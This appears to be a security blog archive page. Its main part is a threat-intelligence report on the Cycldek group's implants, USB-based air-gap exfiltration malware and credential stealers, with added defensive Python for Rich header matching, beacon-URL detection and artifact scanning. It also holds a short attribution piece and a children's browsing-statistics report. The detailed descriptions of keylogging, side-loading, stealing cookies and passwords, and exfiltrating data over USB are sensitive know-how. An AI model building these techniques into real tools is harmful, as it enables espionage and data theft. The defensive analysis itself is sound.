The 4% similarity shown above comes from the matches in the sample’s Rich header. Initially, we were surprised to find the link, even though it made sense; other companies also spotted the similarities and Lazarus was already known for many destructive attacks. Something seemed odd though. The possibility of North Korean involvement looked way off mark, especially since Kim Jong-un’s own sister attended the opening ceremony in Pyeongchang. According to our forensic findings, the attack was started immediately before the official opening ceremony on 9 February, 2018. As we dug deeper into this case, we concluded it was an elaborate false flag; further research allowed us to associate the attack with the Hades APT group (make sure you also read our analysis: “Olympic destroyer is here to trick the industry“).
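To show what a Rich header match is actually built on, here is an added example that is not KTAE code: it decodes the XOR-masked Rich header that the MSVC linker places between the DOS stub and the PE signature, derives a key-independent fingerprint from the toolchain records, and scores two headers by their overlap. The PE prefixes, toolchain records and the MD5-based fingerprint are all constructed for this illustration, not Kaspersky’s scheme.

```python
import hashlib
import struct
from typing import List, Tuple

DANS = 0x536E6144  # "DanS" read as a little-endian dword

Entry = Tuple[int, int, int]  # (product id, build number, use count)


def parse_rich_header(pe: bytes) -> List[Entry]:
    """Decode the Rich header that sits between the DOS stub and the PE signature.
    Returns [] when no well-formed header is present."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        return []
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    region = pe[:min(e_lfanew, len(pe))]
    rich_off = region.rfind(b"Rich")
    if rich_off < 0 or rich_off + 8 > len(region):
        return []
    key = struct.unpack_from("<I", region, rich_off + 4)[0]
    # Every dword before "Rich" is XORed with the key; walk backwards to "DanS".
    words: List[int] = []
    off = rich_off - 4
    while off >= 0:
        word = struct.unpack_from("<I", region, off)[0] ^ key
        if word == DANS:
            break
        words.append(word)
        off -= 4
    else:
        return []  # no "DanS" marker: not a Rich header
    words.reverse()
    # "DanS" is followed by three zero padding dwords, then (compid, count) pairs.
    entries: List[Entry] = []
    for i in range(3, len(words) - 1, 2):
        compid, count = words[i], words[i + 1]
        entries.append((compid >> 16, compid & 0xFFFF, count))
    return entries


def rich_fingerprint(entries: List[Entry]) -> str:
    """Constructed fingerprint: MD5 over the decoded (product, build, count) triples.
    It depends only on the toolchain data, not on the per-file XOR key."""
    raw = b"".join(struct.pack("<HHI", p, b, c) for p, b, c in entries)
    return hashlib.md5(raw).hexdigest()


def rich_similarity(a: List[Entry], b: List[Entry]) -> float:
    """Jaccard overlap of the (product, build) toolchain pairs, in percent."""
    pairs_a = {(p, bld) for p, bld, _ in a}
    pairs_b = {(p, bld) for p, bld, _ in b}
    if not pairs_a and not pairs_b:
        return 0.0
    return 100.0 * len(pairs_a & pairs_b) / len(pairs_a | pairs_b)


def build_pe_stub(entries: List[Entry], key: int) -> bytes:
    """Constructed minimal PE prefix (DOS header + Rich header + 'PE\\0\\0') for testing."""
    rich = struct.pack("<IIII", DANS ^ key, key, key, key)
    for product, build, count in entries:
        rich += struct.pack("<II", ((product << 16) | build) ^ key, count ^ key)
    rich += b"Rich" + struct.pack("<I", key)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40 + len(rich))
    return bytes(dos) + rich + b"PE\0\0"


# Constructed toolchain records (product id, build, count); not from any real sample.
ENTRIES_X: List[Entry] = [(0x5D, 0x2306, 3), (0x93, 0x7809, 12), (0x9E, 0x7809, 1)]
ENTRIES_Y: List[Entry] = [(0x93, 0x7809, 7), (0x9E, 0x7809, 2), (0xAA, 0x9D1B, 1)]
SAMPLE_X = build_pe_stub(ENTRIES_X, 0x86F0B7D5)
SAMPLE_Y = build_pe_stub(ENTRIES_Y, 0x1A2B3C4D)

if __name__ == "__main__":
    x, y = parse_rich_header(SAMPLE_X), parse_rich_header(SAMPLE_Y)
    print("X:", rich_fingerprint(x), "Y:", rich_fingerprint(y))
    print(f"toolchain overlap: {rich_similarity(x, y):.1f}%")
```

The caveat from the OlympicDestroyer case applies directly: the header is plain data in the file, so whoever builds a sample can copy another binary’s Rich header, which is why a match here is a lead to verify, not an attribution.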

This proves that even the best attribution or code similarity technology can be influenced by a sophisticated attacker, and the tools shouldn’t be relied upon blindly. Of course, in 9 out of 10 cases, the hints work very well. As actors become more and more skilled and attribution becomes a sensitive geopolitical topic, we might experience more false flags such as the ones found in the OlympicDestroyer.

If you liked this blog, then you can hear more about KTAE and using it to generate effective Yara rules during the upcoming “GReAT Ideas, powered by SAS” webinar, where, together with my colleague Kurt Baumgartner, we will be discussing practical threat hunting and how KTAE can boost your research. Make sure to register for GReAT Ideas, powered by SAS, by clicking here.

Register: https://www.brighttalk.com/webcast/15591/414427

Note: more information about the APTs discussed here, as well as KTAE, is available to customers of Kaspersky Intelligence Reporting. Contact: intelreports@kaspersky.com

 

3 June 2020

Cycldek: Bridging the (air) gap

Key findings

While investigating attacks related to a group named Cycldek after 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi. Here are some key insights that will be described in this publication:

  • Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast Asia.
  • Our analysis shows two distinct patterns of activity, indicating the group consists of two operational entities that are active under a mutual quartermaster.
  • We were able to uncover an extensive toolset for lateral movement and information stealing used in targeted networks, consisting of custom and unreported tools as well as living-off-the-land binaries.
  • One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.

Background

Cycldek is a long-known Chinese-speaking threat actor. Based on the group’s past activity, it has a strong interest in Southeast Asian targets, with a primary focus on large organizations and government institutions in Vietnam. This is evident from a series of targeted campaigns that are publicly attributed to the group, as outlined below:

  • 2013 – indicators affiliated to the group were found in a network of a technology company operating in several sectors, as briefly described by CrowdStrike.
  • 2014 – further accounts by CrowdStrike describe vast activity by the group against Southeast Asian organizations, most notably Vietnam. The campaigns made prominent use of Vietnamese-language lure documents, delivering commodity malware like PlugX, that was typically leveraged by Chinese-speaking actors.
  • 2017 – the group was witnessed launching attacks using RTF lure documents with political content related to Vietnam, dropping a variant of a malicious program named NewCore RAT, as described by Fortinet.
  • 2018 – attacks have been witnessed in government organizations across several Southeast Asian countries, namely Vietnam, Thailand and Laos, using a variety of tools and new TTPs. Those include usage of the Royal Road builder, developed versions of the NewCore RAT malware and other unreported implants. These were the focus of intel reports available to Kaspersky’s Threat Intelligence Portal subscribers since October 2019, and will be the subject matter of this blog post.

Figure 1: Timeline of Cycldek-attributed attacks.

Most attacks that we observed after 2018 start with a politically themed RTF document built with the 8.t document builder (also known as ‘Royal Road’) and sent as a phishing mail to the victims. These documents are bundled with 1-day exploits (e.g. CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) which in turn run a dropper for three files:

  • a legitimate signed application, usually related to an AV product, e.g. QcConsol – McAfee’s QuickClean utility, and wsc_proxy.exe, Avast’s remediation service.
  • a malicious DLL which is side-loaded by the former application.
  • an encrypted binary which gets decrypted and executed by the DLL.

The final payload that is run in memory is malware known as NewCore RAT. It is based on an open-source framework named PcShare or PcClient that used to be prevalent in Chinese hacker forums more than a decade ago. Today, the software is fully available on Github, allowing attackers to leverage and modify it for their needs.

In the case of Cycldek, the first public accounts of the group’s usage of NewCore date back to 2017. As described in a blog post by Fortinet, the malware provides the attacker with broad capabilities such as conducting a range of operations on files, taking screenshots, controlling the machine via a remote shell and shutting down or restarting the system.

Two implants, two clusters

When inspecting the NewCore RAT malware delivered during the various attacks we investigated, we were able to distinguish between two variants. Both were deployed as side-loaded DLLs and shared multiple similarities, both in code and behavior. At the same time, we noticed differences that indicate the variants could have been used by different operators.

Our analysis shows that the underlying pieces of malware and the way they were used form two clusters of activity. As a result, we named the variants BlueCore and RedCore and examined the artifacts we found around each one in order to profile their related clusters. Notable characteristics of each cluster’s implant are summarized in the table below.

| | BlueCore | RedCore |
|---|---|---|
| Initial Infection Vector | RTF documents | Unknown |
| Legitimate AV Utility | QcConsol.exe (McAfee’s QuickClean utility) | wsc_proxy.exe (Avast’s remediation application) |
| Side-Loaded DLL | QcLite.dll | wsc.dll |
| Payload Loader | stdole.tlb – contains PE loading shellcode and an encrypted BlueCore binary | msgsm64.acm – contains PE loading shellcode and an encrypted RedCore binary |
| Injected Process | dllhst3g.exe | explorer.exe or winlogon.exe |
| Configuration File | %APPDATA%\desktop.ini | C:\Documents and Settings\All Users\Documents\desktop.ini or C:\Documents and Settings\All Users\Documents\desktopWOW64.ini |
| Mutexes | UUID naming scheme, e.g. {986AFDE7-F299-4A7D-BBF4-CA756FC27208}, {CF94A87F-4B49-4751-8E5C-DA2D0A8DEC2F} | UUID naming scheme, e.g. {CB191C19-1D2D-45FC-9092-6DB462EFEAC6}, {F0062B9A-15F8-4D5F-9DE8-02F39EBF71FB}, {E68DFA68-1132-4A32-ADE2-8C87F282C457}, {728264DE-3701-419B-84A4-2AD86B0C43A3}, {2BCD5B61-288C-44D5-BA0D-AAA00E9D2273}, {D9AE3AB0-D123-4F38-A9BE-898C8D49A214} |
| Communicated URL Scheme | http://%s:%d/link?url=%s&enpl=%s&encd=%s | http://%s:%d/search.jsp?referer=%s&kw=%s&psid=%s or http://%s:%d/search.jsp?url=%s&referer=%s&kw=%s&psid=%s |

Table 1: Comparison of BlueCore and RedCore loader and implant traits.

As demonstrated by the table, the variants share similar behavior. For example, both use DLL load order hijacking to run code from DLLs impersonating dependencies of legitimate AV utilities and both share a mutex naming convention of random UUIDs, where mutexes are used for synchronization of thread execution. By comparing code in both implants, we can find multiple functions that originate from the PCShare RAT; however, several others (like the injection code in the figure below) are proprietary and demonstrate identical code that may have been written by a shared developer.

Figure 2: Code similarity in proprietary injection code used in both RedCore and BlueCore implants. Code marked in yellow in BlueCore is an inlined version of the marked function in RedCore.

Moreover, both implants leverage similar injected shellcode used to load the RedCore and BlueCore implants. This shellcode, which resides in the files ‘stdole.tlb’ and ‘msgsm64.acm’, contains a routine used to decrypt the implants’ raw executable from an embedded blob, map it to memory and execute it from its entry point in a new thread. Since both pieces of shellcode are identical for the two variants and cannot be attributed to any open source project, we estimate that they originate from a proprietary shared resource.

Figure 3: Call flow graph comparison for binary decryption functions used by the shellcode in both clusters.

Having said that, it is also evident that there are differences between the variants. The clearest distinctions can be made by looking at malware functionality that is unique to one type of implant and absent from the other. The following are examples of features that could be found only in RedCore implants, suggesting that despite their similarity with BlueCore, they were likely used by a different entity for different purposes:

  • Keylogger: RedCore records the title of the current foreground window (if it exists) and logs keystrokes each 10ms to an internal buffer of size 65530. When this buffer is filled, data from it is written to a file named ‘RCoRes64.dat’. The data is encoded using a single byte XOR with the key 0xFA.
  • Device enumerator: RedCore registers a window class intended to intercept window messages with a callback that checks if the inspected message was sent as a result of a DBT_DEVICEARRIVAL event. Such events signal the connection of a device to the system, in which case the callback verifies that this device is a new volume, and if it is, it sends a bitmap with the currently available logical drives to the C&C.
  • RDP logger: RedCore subscribes to an RDP connection event via ETW and notifies the C&C when it occurs. The code that handles this functionality is based on a little-known Github repository named EventCop which is intended to obtain a list of users that connected to a system via RDP. The open-source code was modified so that instead of printing the data of the incoming connection, the malware would contact the C&C and inform it about the connection event.
  • Proxy server: RedCore spawns a server thread that listens on a pre-configured port (by default 49563) and accepts requests from non-localhost connections. A firewall exception is made for the process before the server starts running, and any subsequent requests passed from a source to it will be validated and passed on to the C&C in their original format.

Perhaps the most notable difference between the two implants is the URL scheme they use to connect and beacon their C&C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&C servers and divide the underlying infrastructure based on the aforementioned two clusters. The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code. All of the discovered domains were used to download further samples.

Figure 4: Difference in URL scheme used by each implant for C2 communication.
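The fixed beacon formats in Table 1 are usable as a network detection, since the implants emit the query parameters in a fixed order. The following is an added example, not Cycldek tooling or Kaspersky code: it turns both URL schemes into regular expressions and runs them over constructed proxy log lines (timestamp, client, method, URL; TEST-NET addresses only).

```python
import re
from typing import List, Optional, Tuple

# Beacon URL formats from Table 1 as regexes. Each %s/%d placeholder becomes a
# wildcard; the fixed path and parameter order are what make the match specific,
# so a URL with missing or extra parameters is deliberately not matched.
SIGNATURES = [
    ("BlueCore", re.compile(
        r"^https?://[^/\s]+/link\?url=[^&\s]*&enpl=[^&\s]*&encd=[^&\s]*$")),
    ("RedCore", re.compile(
        r"^https?://[^/\s]+/search\.jsp\?referer=[^&\s]*&kw=[^&\s]*&psid=[^&\s]*$")),
    ("RedCore", re.compile(
        r"^https?://[^/\s]+/search\.jsp\?url=[^&\s]*&referer=[^&\s]*&kw=[^&\s]*&psid=[^&\s]*$")),
]


def classify_url(url: str) -> Optional[str]:
    """Return the cluster whose beacon format the URL matches, else None."""
    for cluster, pattern in SIGNATURES:
        if pattern.match(url):
            return cluster
    return None


# Constructed proxy log lines; values after '=' are arbitrary base64-looking tokens.
SAMPLE_LOG = """\
2020-05-12T09:14:03Z 10.20.4.17 GET http://203.0.113.8:8080/link?url=QUJD&enpl=REVG&encd=R0hJ
2020-05-12T09:14:09Z 10.20.4.21 GET http://www.example.com/search.jsp?kw=laptop
2020-05-12T09:15:41Z 10.20.4.17 GET http://203.0.113.8:8080/link?url=QUJD
2020-05-12T09:16:02Z 10.20.7.5 GET http://198.51.100.23:443/search.jsp?url=aHR0cA&referer=MTIz&kw=ZGF0YQ&psid=OTk5
2020-05-12T09:16:30Z 10.20.7.9 GET http://198.51.100.23:443/search.jsp?referer=MTIz&kw=ZGF0YQ&psid=OTk5&extra=1
"""

Hit = Tuple[str, str, str]  # (client, cluster, url)


def scan_log(text: str) -> List[Hit]:
    """Flag log lines whose URL matches either implant's beacon format."""
    hits: List[Hit] = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # malformed line, skip rather than crash
        client, url = fields[1], fields[3]
        cluster = classify_url(url)
        if cluster:
            hits.append((client, cluster, url))
    return hits


if __name__ == "__main__":
    for client, cluster, url in scan_log(SAMPLE_LOG):
        print(f"{client} -> {cluster}: {url}")
```

Because the page notes that these requests were issued by legitimate signed applications, a hit here is best paired with endpoint telemetry on which process opened the connection.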

The conclusion that we were able to reach from this is that while all targets were diplomatic and government entities, each cluster of activity had a different geographical focus. The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018. The statistics of these activities, based on the number of detected samples we witnessed downloaded from each cluster of C&Cs, are outlined in the figures below.

Figure 5: Volume of downloaded samples from C&Cs of each cluster by country and month, since mid-2018.

Furthermore, considering both differences and similarities, we are able to conclude that the activities we saw are affiliated to a single actor, which we refer to as Cycldek. In several instances, we spotted unique tools crafted by the group that were downloaded from servers of both groups. One example of this, which can be seen in the figure below, is a tool custom built by the group named USBCulprit. Two samples of it were downloaded from both BlueCore and RedCore servers. A more comprehensive list can be found in the Appendix. All in all, this suggests the entities operating behind those clusters are sharing multiple resources – both code and infrastructure – and operating under a single organizational umbrella.

Figure 6: Examples of proprietary malware named USBCulprit downloaded from servers of both clusters. Further examples are provided in the Appendix.

Info stealing and lateral movement toolset

During the analysis, we were able to observe a variety of tools downloaded from both BlueCore and RedCore implants used for either lateral movement in the compromised networks or information stealing from infected nodes. There were several types of these tools – some were proprietary and formerly unseen in the wild; others were pieces of software copied from open-source post-exploitation frameworks, some of which were customized to complete specific tasks by the attackers.

As in the cases of RedCore and BlueCore, the downloaded tools were all invoked as side-loaded DLLs of legitimate signed applications. Such applications included AV components like wsc_proxy.exe (Avast remediation service), qcconsol.exe and mcvsshld.exe (McAfee components), as well as legitimate Microsoft and Google utilities like the resource compiler (rc.exe) and Google Updates (googleupdate.exe). These tools could be used in order to bypass weak security mechanisms like application whitelisting, grant the malware additional permissions during execution or complicate incident response.

As already mentioned, the bulk of these tools are common and widespread among attackers, sometimes referred to as living-off-the-land binaries, or LOLbins. Such tools can be part of open-source and legitimate software, abused to conduct malicious activities. Examples include BrowserHistoryView (a NirSoft utility to obtain browsing history from common browsers), ProcDump (a Sysinternals tool used to dump process memory, possibly to obtain passwords from running processes), Nbtscan (a command line utility intended to scan IP networks for NetBIOS information) and PsExec (a Sysinternals tool used to execute commands remotely in the network, typically used for lateral movement).

The rest of the tools were either developed fully by the attackers or made use of known tools that were customized to accommodate particular attack scenarios. The following are several notable examples:

  • Custom HDoor: an old tool providing full-featured backdoor capabilities like remote machine administration, information theft, lateral movement and the launch of DDoS attacks. Developed by a hacker known as Wicked Rose, it was popular in Chinese underground forums for a while and made its way into the APT world in the form of variants based on it. One example is the Naikon APT that made use of the original tool.
    The custom version used by Cycldek uses a small subset of the features and the attackers used it to scan internal networks and create tunnels between compromised hosts in order to avoid network detections and bypass proxies. The tool allows the attackers to exfiltrate data from segregated hosts accessible through the local network but not connected to the internet.

Figure 7: Command line usage of the custom HDoor tool.

  • JsonCookies: proprietary tool that steals cookies from SQLite databases of Chromium-based browsers. For this purpose, the sqlite3.dll library is downloaded from the C&C and used during execution to parse the database and generate a JSON file named ‘FuckCookies.txt’ containing stolen cookie info. Entries in the file resemble this one:
{ "domain": ".google.com", "id": 1, "name": "NID", "path": "/", "value": "%VALUE%" }
  • ChromePass: proprietary tool that steals saved passwords from Chromium-based browser databases. The output of the parsed database is an HTML document containing a table with URLs and their corresponding stolen username and password information. This program includes a descriptive command line message that explains how to use it, as outlined below.

Figure 8: Command line usage of the ChromePass tool.

Formerly Unreported Malware: USBCulprit

One of the most notable examples in Cycldek’s toolset that demonstrates both data stealing and lateral movement capabilities is a malware we discovered and dubbed USBCulprit. This tool, which we saw downloaded by RedCore implants in several instances, is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.

During the time the malware was active, it showed little change in functionality. Based on Kaspersky’s telemetry, USBCulprit has been seen in the wild since 2014, with the latest samples emerging at the end of 2019. The most prominent addition incorporated to samples detected after 2017 is the capability to execute files with a given name from a connected USB. This suggests that the malware can be extended with other modules. However, we were not able to capture any such files and their purpose remains unknown.

Another change we saw is the loading scheme used for variants spotted after 2017. The older versions made use of a dropper that wrote a configuration file to disk and extracted an embedded cabinet archive containing a legitimate binary and a malicious side-loaded DLL. This was improved in the newer versions, where an additional stage was added, such that the side-loaded DLL decrypts and loads a third file from the archive containing the malicious payload. As a result, the latter can be found in its decrypted form only in memory.

This loading scheme demonstrates that the actor behind it makes use of similar TTPs seen in the previously described implants attributed to Cycldek. For example, binaries mimicking AV components are leveraged for conducting DLL load-order hijacking. In this case, one of the files dropped from the cabinet archive named ‘wrapper.exe’ (originally named ‘PtUserSessionWrapper.exe’ and belonging to Trend Micro) forces the execution of a malicious DLL named ‘TmDbgLog.dll’. Also, the malware makes use of an encrypted blob that is decrypted using RC4 and executed using a custom PE loader. The full chain is depicted in the figure below.

Figure 9: USBCulprit’s loading flow, as observed in samples after 2017.

Once USBCulprit is loaded to memory and executed, it operates in three phases:

  • Bootstrap and data collection: this stage prepares the environment for the malware’s execution. Namely, it invokes two functions named ‘CUSB::RegHideFileExt’ and ‘CUSB::RegHideFile’ that modify registry keys to hide the extensions of files in Windows and verify that hidden files are not shown to the user. It also writes several files to disk and initializes a data structure with paths that are later used or searched by the malware. Additionally, the malware makes a single scan to collect files it intends to steal using a function named ‘CUSB::USBFindFile’. They are sought by enumerating several predefined directories to locate documents with one of the following extensions: *.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf. Every document found is logged in a file that lists all targeted paths for theft within a directory, such that every checked directory has a corresponding list file.

The chosen files are then grouped into encrypted RAR archives. To achieve that, the malware extracts a ‘rar.exe’ command line utility, hardcoded as a cabinet archive in its binary, and runs it against every list created in the previous step. The password for the archive is initialized at the beginning of the malware’s execution, and is set to ‘abcd!@#$’ for most variants that we observed.

It is worth noting that sought documents can be filtered by their modification date. Several variants of USBCulprit perform a check for a file named ‘time’ within the directory from which the malware is executed. This file is expected to have a date-time value that specifies the modification timestamp beyond which files are considered of interest and should be collected. If the ‘time’ file doesn’t exist, it is created with the default value ‘20160601000000’ corresponding to 01/06/2016 00:00:00.

  • USB connection interception and data exfiltration/delivery: when bootstrapping and data collection is completed, the malware attempts to intercept the connection of new media and verify that it corresponds to a removable drive. This is achieved by running an infinite loop, whereby the malware is put to sleep and wakes at constant intervals to check all connected drives with the GetDriveTypeW function. If at least one is of type DRIVE_REMOVABLE, further actions are taken.

When a USB is connected, the malware checks whether stolen data should be exfiltrated to it or whether it already contains data that should be copied locally. To do this, a directory named ‘$Recyc1e.Bin’ is searched for on the drive and, if not found, is created. This directory is used as the target path for copying files to the drive or the source path for obtaining them from it.

To determine which direction of file copy should take place, a special marker file named ‘1.txt’ is searched for locally. If it exists, the malware expects to find the aforementioned ‘$Recyc1e.Bin’ directory on the drive with previously stolen document archives and attempts to copy it to the disk. Otherwise, the local archive files are copied from the disk into the same directory on the drive.

Figure 10: USBCulprit’s check for the 1.txt marker, indicating if stolen files should be copied to the removable drive, or from it.

  • Lateral movement and extension: as part of the same loop mentioned above, the existence of another marker file named ‘2.txt’ is checked locally to decide whether lateral movement should be conducted. Only if this file exists will the malware’s binary be copied from its local path to the ‘$Recyc1e.Bin’ directory. It’s noteworthy that we were unable to spot any mechanism that could trigger the execution of the malware upon USB connection, which leads us to believe the malware is supposed to be run manually by a human handler. Apart from the above, USBCulprit is capable of updating itself or extending its execution with further modules. This is done by looking for the existence of predefined files on the USB and executing them. Examples of these include {D14030E9-C60C-481E-B7C2-0D76810C6E96} and {D14030E9-C60C-481E-B7C2-0D76810C6E95}. Unfortunately, we could not obtain those files during analysis and cannot tell what their exact purpose is. We can only guess, based on their behavior, that they are used as extension modules or updated versions of the malware itself. The former is an archive that is extracted to a specific directory whose files are enumerated and executed using an internal function named ‘CUSB::runlist’, while the latter is a binary that is copied to the %TEMP% directory and spawned as a new process.

The characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines. This would explain the lack of any network communication in the malware, and the use of only removable media as a means of transferring inbound and outbound data. Also, we witnessed some variants issue commands to gather various pieces of host network information. These are logged to a file that is later transferred along with the stolen data to the USB and can help attackers profile whether the machine in which the malware was executed is indeed part of a segregated network.

Figure 11: Commands used to profile the network connectivity of the compromised host.

Another explanation is that the malware was handled manually by operators on the ground. As mentioned earlier, there is no evident mechanism for automatically executing USBCulprit from infected media, and yet we saw that the same sample was executed from various drive locations, suggesting it was indeed spread around. This, along with the very specific files that the malware seeks as executable extensions and which could not be found as artifacts elsewhere in our investigation, points to a human factor being required to assist deployment of the malware in victim networks.
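As a defender-side illustration of the on-disk traces described above, the following added example (my own code, not Kaspersky’s tooling) walks a directory tree and flags the USBCulprit artifacts named in this analysis: the ‘$Recyc1e.Bin’ staging directory, the ‘time’ cutoff file with the ‘1.txt’/‘2.txt’ markers beside it, the two extension-module file names, and the wrapper.exe/TmDbgLog.dll side-loading pair. The sample tree it builds is constructed for the demo, the directory names in it are hypothetical, and the severity labels are my own assumption.

```python
import os
import tempfile
from datetime import datetime
from pathlib import Path

# Artifact names are taken from the analysis above; severity labels are an assumption.
STAGING_DIR = "$Recyc1e.Bin"
MARKERS = {
    "1.txt": "copy stolen archives from USB to host",
    "2.txt": "copy malware binary to USB (lateral movement)",
}
EXTENSION_FILES = {
    "{D14030E9-C60C-481E-B7C2-0D76810C6E96}",  # archive extracted and run via CUSB::runlist
    "{D14030E9-C60C-481E-B7C2-0D76810C6E95}",  # binary copied to %TEMP% and spawned
}
SIDELOAD_PAIR = {"wrapper.exe", "tmdbglog.dll"}  # compared case-insensitively
DEFAULT_TIME = "20160601000000"  # default 'time' cutoff: 01/06/2016 00:00:00


def parse_time_file(text):
    """Return the datetime cutoff from a 'time' file (YYYYMMDDhhmmss), or None if malformed."""
    value = text.strip()
    if len(value) != 14 or not value.isdigit():
        return None
    try:
        return datetime.strptime(value, "%Y%m%d%H%M%S")
    except ValueError:
        return None


def scan_tree(root):
    """Walk `root` and return (severity, path, description) tuples for USBCulprit traces."""
    findings = []
    for dirpath, _subdirs, filenames in os.walk(root):
        here = Path(dirpath)
        names = set(filenames)
        lowered = {n.lower(): n for n in filenames}

        if here.name.lower() == STAGING_DIR.lower():
            findings.append(("high", str(here), "USBCulprit staging directory"))

        for name in names & EXTENSION_FILES:
            findings.append(("high", str(here / name), "USBCulprit extension/update module file"))

        if SIDELOAD_PAIR.issubset(lowered):
            findings.append(("high", str(here), "wrapper.exe beside TmDbgLog.dll (side-loading pair)"))

        # A file called 'time' is common; weigh it only when it holds the 14-digit cutoff,
        # and only then treat 1.txt / 2.txt next to it as USBCulprit markers.
        if "time" in lowered:
            time_path = here / lowered["time"]
            try:
                raw = time_path.read_text(errors="replace")
            except OSError:
                continue
            cutoff = parse_time_file(raw)
            if cutoff is None:
                continue
            severity = "high" if raw.strip() == DEFAULT_TIME else "medium"
            findings.append((severity, str(time_path),
                             f"collection cutoff {cutoff:%Y-%m-%d %H:%M:%S}"))
            for marker, meaning in MARKERS.items():
                if marker in names:
                    findings.append(("high", str(here / marker), f"marker file: {meaning}"))
    return findings


def build_sample_tree():
    """Constructed sample tree (not a real infection) that exercises every check in scan_tree."""
    root = Path(tempfile.mkdtemp(prefix="usbculprit_demo_"))
    host = root / "host" / "ProgramData" / "Update"   # hypothetical malware directory
    host.mkdir(parents=True)
    (host / "wrapper.exe").write_bytes(b"MZ")
    (host / "TmDbgLog.dll").write_bytes(b"MZ")
    (host / "time").write_text(DEFAULT_TIME)
    (host / "2.txt").write_text("")
    usb = root / "usb"                                  # hypothetical removable drive
    (usb / STAGING_DIR).mkdir(parents=True)
    (usb / "{D14030E9-C60C-481E-B7C2-0D76810C6E95}").write_bytes(b"MZ")
    clean = root / "clean"                              # benign look-alikes, must not fire
    clean.mkdir()
    (clean / "time").write_text("not a timestamp")
    (clean / "1.txt").write_text("shopping list")
    return root


if __name__ == "__main__":
    for severity, path, why in scan_tree(build_sample_tree()):
        print(f"[{severity}] {path}: {why}")
```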

Conclusion

Cycldek is an example of an actor that has broader capability than publicly perceived. While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.

Furthermore, our analysis of the implants affiliated to the group gives an insight into its organizational structure. As already stated, the similarities and differences in various traits of these pieces of malware indicate that they likely originated from different arms of a single organization. It is also worth noting that we observed multiple points where such entities didn’t work in a well-coordinated manner, for example, infecting machines using the BlueCore implant when they were already infected with RedCore.

Lastly, we believe that such attacks will continue in Southeast Asian countries. The use of different tools to reach air-gapped networks in the same countries and attempts to steal data from them have been witnessed in the past. Our analysis shows this type of activity has not ceased – it has merely evolved and changed shape, in terms of malware and actors. We continue to track the actor and report on its activity in our Threat Intelligence Portal.

For more information about Cycldek operations, contact us at: intelreports@kaspersky.com

Appendix – IOCs

Note: a full list of IOCs can be found in our reports on the subject in Kaspersky’s Threat Intelligence Portal.


3 June 2020

Kids on the Web in 2020

Technology is what is saving us from a complete change in the way of life in a world of a raging pandemic. It keeps the educational process going, relieves the shortage of human communication and helps us to live life as fully as possible given the isolation and social distancing. Many adults, and children too, have come to realize that the computer is not just a means of entertainment, but an important tool for education, communication and personal growth.

In this article, we look at changes that occurred in children’s behavior on the Web over the past year and the pandemic period. The report is based on statistics gathered by Kaspersky Safe Kids, a software solution that protects children from unwanted content on the Internet.

How we collect our statistics

Kaspersky Safe Kids scans the contents of a Web page the child is trying to access. If the site falls into one of fourteen undesirable categories, the module sends an alert to Kaspersky Security Network. No personal user information is transmitted, and privacy is not compromised.

We will note two important points:

  • It is up to the parent to decide which content to block by tweaking the protective solution’s preferences. But anonymous statistics are collected for all the 14 categories.
  • Data is harvested only from computers running Windows and macOS; no mobile statistics are provided in this report.

Website categorization

Kaspersky Safe Kids filters Web content according to the following categories:

In this article, we will take a closer look at the most-visited categories for the past year. We have combined the less popular ones into a separate category, with their share of alerts marked as “Other”.

Picture of the world

Kaspersky Safe Kids alerts distribution by category in June 2019 through May 2020

Children around the world have spent increasingly more time watching videos and listening to music. Software, Audio, Video accounted for nearly forty percent of all Safe Kids alerts over the past year. It was followed by Internet Communications with 24.16 percent and Video Games with 15.98 percent. Online stores were fourth in popularity with 11 percent and News was fifth with 5.54 percent.

Interestingly, Job Search sites with 0.89 percent attracted far more interest from teenagers than Adult Content with 0.74 percent.

Kaspersky Safe Kids Windows and macOS alerts distribution by category in June 2019 through May 2020

Windows users spent more time watching videos, gaming and reading news than macOS users. The latter preferred chatting and spent much more time shopping online. That said, Windows users visited adult content more frequently on average during the year.

Kaspersky Safe Kids alerts distribution by category in June 2019 through May 2020

The pandemic forced kids to study at home, attending classes online, and we have seen how this affected their time at the computer. Starting at the beginning of the year, they visited gaming sites less frequently, even when compared with the September 2019 low of 16.75 percent: the figure fell to 13.26 percent in May. Meanwhile, Internet Communications showed slight growth in April, exceeding the October 2019 high by 0.85 p.p. to reach 27.51 percent.

Children visited online stores the most in the October of 2019. The category accounted for 16.93 percent of all alerts. The popularity of online shopping has steadily decreased since then, dropping by 7.57 p.p. to 9.3 percent by April, but May saw it rebound slightly. Adult Content grew somewhat (by about 0.5 p.p.) in winter, then returned to the summer 2019 levels (0.49 percent) in May.

The graph shows an abnormal drop in visits to Software, Audio, Video websites in October. The most likely cause is the new macOS version, Catalina, released on October 7. Users who installed the update faced issues with streaming video on YouTube, Netflix, Amazon Prime and many other sites. The issue affected not just the Safari browser, but Google Chrome, Opera and Firefox as well. It was fixed in November, a fact that the statistics reflect.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on macOS in June 2019 through May 2020

Differences across regions, countries and months

